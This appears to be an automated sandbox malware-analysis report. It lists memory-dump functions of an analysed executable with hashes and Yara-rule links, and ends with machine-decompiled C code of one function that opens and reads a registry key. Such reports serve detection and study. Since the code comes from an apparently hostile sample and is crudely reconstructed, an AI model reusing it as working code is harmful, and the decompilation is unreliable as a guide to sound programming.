{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: 9ef41bbba7045bb7ec8cd54a1d02570196ffb5b4e56e5eb95f5958ed1dc0107e
Instruction ID: 39c3707cdf2fffe74f1391811c750f3e16324b4df7d0ff0c972d8c610fd81b6e
Opcode Fuzzy Hash: 9ef41bbba7045bb7ec8cd54a1d02570196ffb5b4e56e5eb95f5958ed1dc0107e
Instruction Fuzzy Hash: 6051A952D3DB0595E207AE3088809712E58EF97353330DB7F9873B61E2A63E4B47658E

Uniqueness

Uniqueness Score: -1.00%

Function 00402F43, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: {0C&
API String ID: 0-2957542442
Opcode ID: c7238cd3d4d7fdf97d666390888be78b68c97b1a7876f13b50f49fddc4327e73
Instruction ID: 00f44df966f4fba3a3d7322c04a539ea884b768916999f0b3769ab7276bf52c1
Opcode Fuzzy Hash: c7238cd3d4d7fdf97d666390888be78b68c97b1a7876f13b50f49fddc4327e73
Instruction Fuzzy Hash: 3251CC52D3DB0195E2036E3084809712E58EF97347370DB7F9873B61E2A63E4B47648E

Uniqueness

Uniqueness Score: -1.00%

Function 00403471, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 281memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: 0a33c5a8cade877c54c004a75c014e03c8684dd7d096227332398531092489de
Instruction ID: 9f85ad4807011824dcd0e7a727975b26c4ed529316502612892e7c6edda859d3
Opcode Fuzzy Hash: 0a33c5a8cade877c54c004a75c014e03c8684dd7d096227332398531092489de
Instruction Fuzzy Hash: 9B412421D2860169DD329D305D405762E9CEA76333B249A3BE463B63F2A63E4F07618D

Uniqueness

Uniqueness Score: -1.00%

Function 004031DF, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 271memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: c568406e7a6d36000ec27e7cbc000993c0540c138b44f0f7fbf9465915cde9a7
Instruction ID: d1b62fd2978fe1f7102ae479d506de20587178a4d70ef326f36dd43bda6c2f30
Opcode Fuzzy Hash: c568406e7a6d36000ec27e7cbc000993c0540c138b44f0f7fbf9465915cde9a7
Instruction Fuzzy Hash: 12419852D3CB059AE113AE3044809702E98EE56353330EB7F98B3B61E2A63E4747658E

Uniqueness

Uniqueness Score: -1.00%

Function 0040303F, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 260memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: 50a8ee8bce4f8c96e416b59a417b1b75f70af5305edf91a0a3a822cd4c194095
Instruction ID: 1c23a94d4f3c7d3bd10c0b056e3ce374f2f8ec7c38678f2018845e82c3ad6461
Opcode Fuzzy Hash: 50a8ee8bce4f8c96e416b59a417b1b75f70af5305edf91a0a3a822cd4c194095
Instruction Fuzzy Hash: 9E519A52D3DB0599E203AE3044809712E98EF57343330DB7F9873B61E2A63E4B47658E

Uniqueness

Uniqueness Score: -1.00%

Function 00403091, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 250memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: d1918527494e8d3e85cde3c05842d99278d43be5a0a5dc0b587ad8c3b71c4dd2
Instruction ID: af97af8a421361e515b5e45978aa8219e47bc046df6cef0c1c92f888bd18ccfd
Opcode Fuzzy Hash: d1918527494e8d3e85cde3c05842d99278d43be5a0a5dc0b587ad8c3b71c4dd2
Instruction Fuzzy Hash: 5F51BB52D3DB0599E203AE3084809712E58EE57353370DB7F9873B71E2A63E4B47658E

Uniqueness

Uniqueness Score: -1.00%

Function 004033C4, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: 578fd621e308a689a862f5b2a958ce762cc8a5cf2eb06b120ac55db193291329
Instruction ID: 42833c7591c9c6a0ed308a472c3474b02158d7d19558002f3f355ec8fe276280
Opcode Fuzzy Hash: 578fd621e308a689a862f5b2a958ce762cc8a5cf2eb06b120ac55db193291329
Instruction Fuzzy Hash: 0231AA52D3C7059AE203AD3044849712E98EA5A353330DB7FD473B71E2A63E4707658E

Uniqueness

Uniqueness Score: -1.00%

Function 00403326, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 234memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: 38a6f8367d0d775d0da53c63e70b393d069349a51260a4eda1b7c5c6aaf4a9bf
Instruction ID: e9ba6a725020005de182cd98c74aea972c0e12f650bf6941f9f4270f204571a7
Opcode Fuzzy Hash: 38a6f8367d0d775d0da53c63e70b393d069349a51260a4eda1b7c5c6aaf4a9bf
Instruction Fuzzy Hash: 94419952D3CB059AE2079E3048809712E98EA56353370DB7FD4B3B71E2A63E4707A58E

Uniqueness

Uniqueness Score: -1.00%

Function 0040341C, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 227memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: 65473fe1cc966f9da1fb5f4f48ca36f1147f154b52615523805f521b56489926
Instruction ID: 4214047f2e4268ff81435c489dd4315a9c73a9cce03dd6b536bd2fad67e5b282
Opcode Fuzzy Hash: 65473fe1cc966f9da1fb5f4f48ca36f1147f154b52615523805f521b56489926
Instruction Fuzzy Hash: 0B31AD42D3C7049AE2039D3048909B12E98EE56253370DB7FD477B71E2A73E4747658E

Uniqueness

Uniqueness Score: -1.00%

Function 00403139, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 226memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: 736e31ba8ed9308d7c4215e32bcbbdad42f10d8e55987b0fd2d4f3bee793f751
Instruction ID: 64edecad0d3bf1b30088c1bffa43543a0f6e6154c62aa89287d5811f7c4f2ac8
Opcode Fuzzy Hash: 736e31ba8ed9308d7c4215e32bcbbdad42f10d8e55987b0fd2d4f3bee793f751
Instruction Fuzzy Hash: 1A51BC52D3CB0499E203AE3044809712EA8EE57353330DB7FD873B61E2A63E4B47658E

Uniqueness

Uniqueness Score: -1.00%

Function 00403283, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 222memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: c1262ef8bda2b544f1796d46196b7bed0890176483dc2bbb37c4522f2a0331e9
Instruction ID: d68fee510410aaacdb1584bb217c03c4ed03036ab64dbea77c3e3d4843c747eb
Opcode Fuzzy Hash: c1262ef8bda2b544f1796d46196b7bed0890176483dc2bbb37c4522f2a0331e9
Instruction Fuzzy Hash: 61416852D2CB059AE203AE3044809712E98EE56353370DB7BD8B3B71E2A63E4747658E

Uniqueness

Uniqueness Score: -1.00%

Function 004032DB, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 194memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: df80338bba137f520a78930fa305321c68ee0dcdb65bbf1d27a5f7245607016d
Instruction ID: 00a9d365092239d01c4154425df82cf546e0420b98c4a5b07c865317ddaf71f1
Opcode Fuzzy Hash: df80338bba137f520a78930fa305321c68ee0dcdb65bbf1d27a5f7245607016d
Instruction Fuzzy Hash: B541AB52D3C70599E207AE3048809712E98EE56353370DB7BE477B71E2A63E8747A18E

Uniqueness

Uniqueness Score: -1.00%

Function 00403376, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: cb783b178a392770ef14328a03068bc704e6a706dd8d0cf36bf26a0e33110207
Instruction ID: a07717485d6f5df75ea00887ad1d67efbf9703308792a0225d19b684cdeb2d1f
Opcode Fuzzy Hash: cb783b178a392770ef14328a03068bc704e6a706dd8d0cf36bf26a0e33110207
Instruction Fuzzy Hash: 01419852D3C7048AD203AE3044809712E98EE5A753330DB7FD4B3B71E2A63E4707A58E

Uniqueness

Uniqueness Score: -1.00%

Function 004034C8, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: 21cb5f5c7fa6de7625df96e6a644dde2b32100532f244371de58ff3725208c45
Instruction ID: 422405dfe6cb74bef0c6f5c414d5b2de77657b75060439399717e5b03e75690a
Opcode Fuzzy Hash: 21cb5f5c7fa6de7625df96e6a644dde2b32100532f244371de58ff3725208c45
Instruction Fuzzy Hash: D3318A52D2C7018AD2039D3004809712E98EE5A253330DB7FE4B3B71D2E73E4707658E

Uniqueness

Uniqueness Score: -1.00%

Function 0040355E, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040359E

Strings

{0C&, xrefs: 00403B55

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: {0C&
API String ID: 4275171209-2957542442
Opcode ID: 61a74ac933f75f0afa39f95556583c5c70336695d1a1e3251f9fd477ff01dd21
Instruction ID: 68498ccced6528844547a34dbe5bc1fb5405e8afd9b7e1471334554e1ccd8a50
Opcode Fuzzy Hash: 61a74ac933f75f0afa39f95556583c5c70336695d1a1e3251f9fd477ff01dd21
Instruction Fuzzy Hash: 8F31AC51D3C7018AD213AE3004909B12F98EA5B253330DB7FD4A3B72D2E63E4707658E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004017F9, Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb5f680e49d839fbfd8e0d8f7424295198c73d1c2b5e0ce248846ad0c75a3313
Instruction ID: 66779e33708b624cb1e06704089130015e71e8a78ebbd5beed843ceb652affa8
Opcode Fuzzy Hash: cb5f680e49d839fbfd8e0d8f7424295198c73d1c2b5e0ce248846ad0c75a3313
Instruction Fuzzy Hash: E041269125E2D4EFC71B47B64CBA2813FE16E07104B1A88EFD6C54B8A3E519241FD727

Uniqueness

Uniqueness Score: -1.00%

Function 00401A39, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 428acb89cf9b99c871daf00860136c15476c4425046302523451e5537aac81d0
Instruction ID: ca188a72de3c5ad16c4800c61484eb54314e7ef8d45a9d797dba8be1467a3c68
Opcode Fuzzy Hash: 428acb89cf9b99c871daf00860136c15476c4425046302523451e5537aac81d0
Instruction Fuzzy Hash: 3D21AA7150D3D5DFCB174B748C652517FB0AF1B20170A44EBD8819F8A7E268281AD727

Uniqueness

Uniqueness Score: -1.00%

Function 004019EC, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC24, Relevance: 57.3, APIs: 38, Instructions: 326
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040BC24(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, signed int _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char* _v32;
				char* _v36;
				void* _v40;
				signed int _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				signed int _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				short _v104;
				char _v112;
				char _v128;
				char _v144;
				char* _v152;
				char _v160;
				intOrPtr _v200;
				char _v208;
				char* _v212;
				short _v216;
				char* _v220;
				signed int _v224;
				signed int _v228;
				char* _v240;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v264;
				char* _t156;
				void* _t157;
				char* _t158;
				char* _t161;
				char* _t164;
				signed short _t173;
				char* _t185;
				intOrPtr _t186;
				signed int _t188;
				short _t199;
				char* _t204;
				intOrPtr _t211;
				void* _t213;
				void* _t216;
				void* _t220;
				char* _t224;
				void* _t241;
				void* _t244;
				void* _t245;
				void* _t246;
				void* _t248;
				intOrPtr _t249;
				void* _t250;
				intOrPtr _t251;

				_t244 = __esi;
				_t241 = __edi;
				_t220 = __ebx;
				_t246 = _t248;
				_t249 = _t248 - 0xc;
				 *[fs:0x0] = _t249;
				L004011F0();
				_v16 = _t249;
				_v12 = 0x401120;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011f6, _t245);
				_push( &_v28);
				_push(0x2003f);
				_push(0);
				_push( *_a12);
				_t156 =  &_v60;
				_push(_t156);
				L00401376();
				_push(_t156);
				_t157 = _a8;
				_push( *_t157);
				E0040B2F0();
				_v212 = _t157;
				L00401370();
				_push(_v60);
				_push(_a12);
				L0040136A();
				_t158 = _v212;
				_v36 = _t158;
				L00401364();
				if(_v36 == 0) {
					_v72 = _v72 & 0x00000000;
					_v80 = 2;
					_push( &_v80);
					_push(0x400);
					L00401358();
					L0040135E();
					L00401352();
					_v56 = 0x400;
					_push( &_v56);
					_push(_v52);
					_t161 =  &_v64;
					_push(_t161);
					L00401376();
					_push(_t161);
					_push( &_v40);
					_push(0);
					_push( *_a16);
					_t164 =  &_v60;
					_push(_t164);
					L00401376();
					_push(_t164);
					_push(_v28);
					E0040B354();
					_v212 = _t164;
					L00401370();
					_push(_v60);
					_push(_a16);
					L0040136A();
					_push(_v64);
					_push( &_v52);
					L0040136A();
					_v36 = _v212;
					_push( &_v64);
					_t158 =  &_v60;
					_push(_t158);
					_push(2);
					L0040134C();
					_t250 = _t249 + 0xc;
					if(_v36 == 0) {
						_v72 = 1;
						_v80 = 2;
						_v152 =  &_v52;
						_v160 = 0x4008;
						_push( &_v80);
						_push(_v56);
						_push( &_v160);
						_push( &_v96);
						L0040133A();
						_push( &_v96);
						_t173 =  &_v60;
						_push(_t173);
						L00401340();
						_push(_t173);
						L00401346();
						asm("sbb eax, eax");
						_v216 =  ~( ~_t173 + 1);
						_t224 =  &_v60;
						L00401364();
						_push( &_v96);
						_push( &_v80);
						_push(2);
						L00401334();
						_t251 = _t250 + 0xc;
						if(_v216 == 0) {
							_v152 =  &_v52;
							_v160 = 0x4008;
							_push(_v56);
							_push( &_v160);
							_push( &_v80);
							L00401328();
							_push( &_v80);
							L0040132E();
							L0040135E();
							L00401352();
							goto L8;
						} else {
							_v152 =  &_v52;
							_v160 = 0x4008;
							_t216 = _v56 - 1;
							if(_t216 < 0) {
								L22:
								L004012FE();
								_push(_t246);
								_push(_t224);
								_push(_t224);
								_push(0x4011f6);
								_push( *[fs:0x0]);
								 *[fs:0x0] = _t251;
								_t213 = 0x10;
								L004011F0();
								_push(_t220);
								_push(_t244);
								_push(_t241);
								_v252 = _t251;
								_v248 = 0x401130;
								_v264 = 0xa066336a;
								_push(0xfbfc2c3b);
								_push(0x402628);
								return _t213;
							} else {
								_push(_t216);
								_push( &_v160);
								_push( &_v80);
								L00401328();
								_push( &_v80);
								L0040132E();
								L0040135E();
								L00401352();
								L8:
								_v220 = _v40;
								_t185 = _v220;
								_v240 = _t185;
								if(_v240 == 1) {
									L00401322();
									goto L18;
								} else {
									if(_v240 == 4) {
										_v228 = 1;
										_v224 = _v224 | 0xffffffff;
										_push(_v52);
										L0040131C();
										_v32 = _t185;
										while(_v32 >= _v228) {
											_v200 =  *_a20;
											_v208 = 8;
											_v72 = 1;
											_v80 = 2;
											_v152 =  &_v52;
											_v160 = 0x4008;
											_push( &_v80);
											_push(_v32);
											_push( &_v160);
											_push( &_v96);
											L0040133A();
											_push( &_v96);
											_t199 =  &_v60;
											_push(_t199);
											L00401340();
											_push(_t199);
											L00401346();
											_v104 = _t199;
											_v112 = 2;
											_push( &_v112);
											_push( &_v128);
											L00401310();
											_push( &_v208);
											_push( &_v128);
											_t204 =  &_v144;
											_push(_t204);
											L00401316();
											_push(_t204);
											L0040132E();
											L0040135E();
											_t224 =  &_v60;
											L00401364();
											_push( &_v144);
											_push( &_v128);
											_push( &_v112);
											_push( &_v96);
											_push( &_v80);
											_push(5);
											L00401334();
											_t251 = _t251 + 0x18;
											_t211 = _v32 + _v224;
											if(_t211 < 0) {
												goto L22;
											} else {
												_v32 = _t211;
												continue;
											}
											goto L24;
										}
										_v88 = 0x80020004;
										_v96 = 0xa;
										_push(0x40b3f4);
										_t188 = _a20;
										_push( *_t188);
										L00401304();
										_v72 = _t188;
										_v80 = 8;
										_push(1);
										_push(1);
										_push( &_v96);
										_push( &_v80);
										L0040130A();
										L0040135E();
										_push( &_v96);
										_t185 =  &_v80;
										_push(_t185);
										_push(2);
										L00401334();
										goto L18;
									} else {
										L18:
										_v48 = _v48 | 0x0000ffff;
										_push(_v28);
										E0040B398();
										_v212 = _t185;
										L00401370();
										_t186 = _v212;
										_v36 = _t186;
										goto L20;
									}
								}
							}
						}
					} else {
						goto L19;
					}
				} else {
					L19:
					L00401322();
					_v48 = _v48 & 0x00000000;
					_push(_v28);
					E0040B398();
					_v212 = _t158;
					L00401370();
					_t186 = _v212;
					_v36 = _t186;
					L20:
					_push(E0040C0A2);
					L00401364();
					return _t186;
				}
				L24:
			}

0x0040bc24
0x0040bc24
0x0040bc24
0x0040bc25
0x0040bc27
0x0040bc36
0x0040bc42
0x0040bc4a
0x0040bc4d
0x0040bc54
0x0040bc63
0x0040bc69
0x0040bc6a
0x0040bc6f
0x0040bc74
0x0040bc76
0x0040bc79
0x0040bc7a
0x0040bc7f
0x0040bc80
0x0040bc83
0x0040bc85
0x0040bc8a
0x0040bc90
0x0040bc95
0x0040bc98
0x0040bc9b
0x0040bca0
0x0040bca6
0x0040bcac
0x0040bcb5
0x0040bcbc
0x0040bcc0
0x0040bcca
0x0040bccb
0x0040bcd0
0x0040bcda
0x0040bce2
0x0040bce7
0x0040bcf1
0x0040bcf2
0x0040bcf5
0x0040bcf8
0x0040bcf9
0x0040bcfe
0x0040bd02
0x0040bd03
0x0040bd08
0x0040bd0a
0x0040bd0d
0x0040bd0e
0x0040bd13
0x0040bd14
0x0040bd17
0x0040bd1c
0x0040bd22
0x0040bd27
0x0040bd2a
0x0040bd2d
0x0040bd32
0x0040bd38
0x0040bd39
0x0040bd44
0x0040bd4a
0x0040bd4b
0x0040bd4e
0x0040bd4f
0x0040bd51
0x0040bd56
0x0040bd5d
0x0040bd64
0x0040bd6b
0x0040bd75
0x0040bd7b
0x0040bd88
0x0040bd89
0x0040bd92
0x0040bd96
0x0040bd97
0x0040bd9f
0x0040bda0
0x0040bda3
0x0040bda4
0x0040bda9
0x0040bdaa
0x0040bdb2
0x0040bdb7
0x0040bdbe
0x0040bdc1
0x0040bdc9
0x0040bdcd
0x0040bdce
0x0040bdd0
0x0040bdd5
0x0040bde1
0x0040be33
0x0040be39
0x0040be43
0x0040be4c
0x0040be50
0x0040be51
0x0040be59
0x0040be5a
0x0040be64
0x0040be6c
0x00000000
0x0040bde3
0x0040bde6
0x0040bdec
0x0040bdf9
0x0040bdfc
0x0040c0cb
0x0040c0cb
0x0040c0d0
0x0040c0d3
0x0040c0d4
0x0040c0d5
0x0040c0e0
0x0040c0e1
0x0040c0ea
0x0040c0eb
0x0040c0f0
0x0040c0f1
0x0040c0f2
0x0040c0f3
0x0040c0f6
0x0040c0fd
0x0040c10f
0x0040c110
0x0040c111
0x0040be02
0x0040be02
0x0040be09
0x0040be0d
0x0040be0e
0x0040be16
0x0040be17
0x0040be21
0x0040be29
0x0040be71
0x0040be74
0x0040be7a
0x0040be80
0x0040be8d
0x0040bea3
0x00000000
0x0040be8f
0x0040be96
0x0040bead
0x0040beb7
0x0040bebe
0x0040bec1
0x0040bec6
0x0040bedd
0x0040bef1
0x0040bef7
0x0040bf01
0x0040bf08
0x0040bf12
0x0040bf18
0x0040bf25
0x0040bf26
0x0040bf2f
0x0040bf33
0x0040bf34
0x0040bf3c
0x0040bf3d
0x0040bf40
0x0040bf41
0x0040bf46
0x0040bf47
0x0040bf4c
0x0040bf50
0x0040bf5a
0x0040bf5e
0x0040bf5f
0x0040bf6a
0x0040bf6e
0x0040bf6f
0x0040bf75
0x0040bf76
0x0040bf7b
0x0040bf7c
0x0040bf86
0x0040bf8b
0x0040bf8e
0x0040bf99
0x0040bf9d
0x0040bfa1
0x0040bfa5
0x0040bfa9
0x0040bfaa
0x0040bfac
0x0040bfb1
0x0040bece
0x0040bed4
0x00000000
0x0040beda
0x0040beda
0x00000000
0x0040beda
0x00000000
0x0040bed4
0x0040bfb9
0x0040bfc0
0x0040bfc7
0x0040bfcc
0x0040bfcf
0x0040bfd1
0x0040bfd6
0x0040bfd9
0x0040bfe0
0x0040bfe2
0x0040bfe7
0x0040bfeb
0x0040bfec
0x0040bff6
0x0040bffe
0x0040bfff
0x0040c002
0x0040c003
0x0040c005
0x00000000
0x0040be98
0x0040c00d
0x0040c00d
0x0040c012
